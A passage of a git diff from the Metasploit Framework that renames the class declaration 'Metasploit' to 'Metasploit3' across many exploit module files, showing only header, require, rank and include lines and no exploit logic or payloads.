a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb index befdd70669..834763a5ad 100644 --- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb +++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index b2a55b7dcd..33c4fe64af 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 81510cd7e7..a8eb39a855 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index e3c75f79e2..d60f8cd99d 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'openssl' require 'rexml/element' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 0811d16c18..f1e7fa938d 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'drb/drb' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index 3851121ee4..d0fe8ca222 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -7,7 +7,7 @@ require 'msf/core' - class Metasploit < Msf::Exploit::Remote + class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb index 122860f0c6..a41272c31f 100644 --- a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb +++ b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb index 2f2f423f43..c48287ca88 100644 --- a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb +++ b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index d71b366a7d..6798e4ff53 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index 1a208c3f44..35658aaeda 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index 909f579131..b03053e9be 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index 141fe2907c..f29e9e831b 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 324bd5c584..745eebb2f2 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index f149fa1db1..0c38798c19 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index dcaf1911ce..a715ed69ab 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index a28fc67c63..ea1f0cd5df 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/mongod_native_helper.rb b/modules/exploits/linux/misc/mongod_native_helper.rb index 2c1c935106..ff457795de 100644 --- a/modules/exploits/linux/misc/mongod_native_helper.rb +++ b/modules/exploits/linux/misc/mongod_native_helper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index df1f821cf2..2048a5c6fc 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index 714d0fcf0a..1ab5730b3b 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 9c4f269a69..479740e771 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index bf7aa452b8..39e294bd2b 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 69851c8136..2376559d8d 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 09d38d6927..4df096710f 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index e956bb1207..bd086efcc5 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index b6ec25438c..e4a4c225b8 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 98d5103d63..0194930466 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/postgres' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 5ed8900633..59fc651054 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index fca3209778..bf98f0278a 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index b312c65076..ae73ad1779 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 2d64a5cc5d..ed72293621 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index bda3f491b4..b5bbdc6329 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 8fb2bbd56e..63f0fdc1a8 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index c4bfd42b7a..2823d626f0 100644 --- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 4e36986c82..4d77912786 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 8c58e2dbbf..7a460a0ac6 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index da5da5b4bc..3a33e74fb0 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index e34c477a65..3a68d2f957 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index f40a004508..83e5191308 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 0308883a29..4885234c97 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 32058dab96..1665ae8b2d 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb index 75cfc31d08..d65f048c33 100644 --- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb +++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index d840f03466..fe94b76a68 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb index 2666536887..445567be76 100644 --- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb index 2250c0753a..dcb5f9346a 100644 --- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 899db27f36..1a6ef9ca70 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index 75537d3f27..bb4886ba44 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb index 641b2dddeb..f79bc97fd5 100644 --- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb index ec7f48d97a..68a671f847 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb index 2db1f45cbc..8c833f900e 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index 21436f3317..b040cd0391 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 1d4906107a..55f244cdda 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb index 0bc1b1e5af..7cf0100b51 100644 --- a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb +++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 87ae96a364..253f4b1b31 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proxy_prototype.rb b/modules/exploits/multi/browser/firefox_proxy_prototype.rb index c43defffcb..8da445326f 100644 --- a/modules/exploits/multi/browser/firefox_proxy_prototype.rb +++ b/modules/exploits/multi/browser/firefox_proxy_prototype.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 00df0c2ebd..4511da4250 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb index 851e4c3633..6bfa1dc147 100644 --- a/modules/exploits/multi/browser/firefox_svg_plugin.rb +++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb index c078c4da23..ad5eda286d 100644 --- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb +++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_webidl_injection.rb b/modules/exploits/multi/browser/firefox_webidl_injection.rb index 6595e9d495..194c1920ba 100644 --- a/modules/exploits/multi/browser/firefox_webidl_injection.rb +++ b/modules/exploits/multi/browser/firefox_webidl_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index 370a293267..f76342cdbf 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 373a5ed7e2..9fe7bb5ea4 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index 3df40d65d8..aedfed2fd1 100644 --- 